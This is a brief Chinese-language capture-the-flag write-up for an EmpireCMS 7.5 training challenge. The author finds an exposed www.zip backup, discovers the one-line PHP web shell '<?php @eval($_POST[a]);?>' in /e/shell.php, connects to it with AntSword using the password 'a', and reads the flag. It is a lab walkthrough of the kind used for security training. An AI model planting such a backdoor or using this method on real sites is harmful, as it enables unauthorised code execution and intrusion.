青少年训练平台--帝国CMS01

第一步：看题目

题目描述：这是采用了帝国CMS7.5的一道CTF题目，这个网站的管理员特别的粗心！！请聪明的你在题目中找到flag哦！

第二步：获取flag

打开链接，看到我是帝国平台，再根据题目描述，我们先扫一下他的后台管理目录，结果看到一个www.zip

我们去访问它，然后就下载了一个www..zip的压缩包

 

 

打开是压缩包，里面在/e目录下有shell.php，内容如下

<?php @eval($_POST[a]);?>

 看到这里，心想，这就简单了，他在/e目录下上传了一句话木马，直接蚁剑去连接，密码为a    

 

 

连接成功，有个/falg，直接查看获取flag

qsnctf{9xxxxxxxxxxxxxxxx8}